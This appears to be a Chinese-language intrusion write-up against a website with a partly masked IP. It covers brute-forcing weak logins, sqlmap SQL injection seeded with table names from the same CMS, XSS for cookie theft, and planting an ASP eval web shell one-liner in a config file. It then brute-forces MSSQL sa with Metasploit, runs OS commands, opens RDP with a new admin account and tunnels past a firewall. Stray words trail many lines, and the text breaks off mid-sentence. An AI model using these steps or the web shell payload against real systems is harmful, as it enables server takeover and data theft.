目標網站:39.xxx.xxx.xxxhtml
一階段前臺測試:sql
一、前臺存在登錄入口且無驗證碼(確定要暴力破解啊)shell
二、前臺url參數處加敏感字符數據庫報錯存在sql注入數據庫
三、前臺登錄處輸入危險字符,數據庫報錯存在post注入緩存
測試結果以下:
cookie
暴力破解得到xss
用戶名:admin編輯器
密碼:123456post
利用sqlmap跑注入並無跑出任何數據測試
只能登錄看一下了
2、登錄前臺測試
利用前臺的會員登錄發現有使用第三方編輯器(並無找到可利用漏洞)
存在xss漏洞
存在sql注入漏洞
在登錄的狀態下繼續進行sql注入(burp copyto file )發現跑出來一個表
只跑出了當前帳戶和一個同級帳戶
到這裏看了眼後臺仍是一臉懵逼
3、黑盒已經很差搞了,下載同類CMS
搭建環境擼一把
把相同源碼cms數據庫表名
將對應代表加入sqlmap庫中
路徑:sqlmap/txt/common-tables.txt
(表名必定要放前邊放最後要跑一年的)
繼續sqlmap跑、
成功進入後臺
4、getshell
進入後臺以後發現編輯器兩個
文件上傳白名單,試了好久,基本行不通了
後臺依舊存在XSS漏洞(這裏的XSS能夠利用拿到後臺管理員cookie)
搞了半天發現又遇到瓶頸了
再去擼一把源碼
發現當更新緩存的時候,根目錄下多了一個HTML文件修改html文件後發現報錯
在後臺參數配置處修改配置發現報錯
審查代碼發現代碼漏洞
anxinMall.basic.asp是一個ASP文件考慮寫入一句話
本地構造payload(這裏隨便改點東西網站就癱了若是在目標網站那確定涼涼了)
"%> <%eval request ("pass")%> <%'
菜刀鏈接、
5、提權、
nmap掃描發現目標開放1433端口
msf對1433端口sa進行爆破
爆破成功
mssql帳號和密碼爲:sa /123456
使用msf命令執行模塊,執行最終的dos命令
use auxiliary/admin/mssql/mssql_exec
開啓3389端口而且創建管理用戶之後
利用HTTP隧道進行鏈接3389(繞過防火牆)
詳細方法見下面的網址
https://www.cnblogs.com/xiaoyunxiaogang/p/10939485.html
另外能夠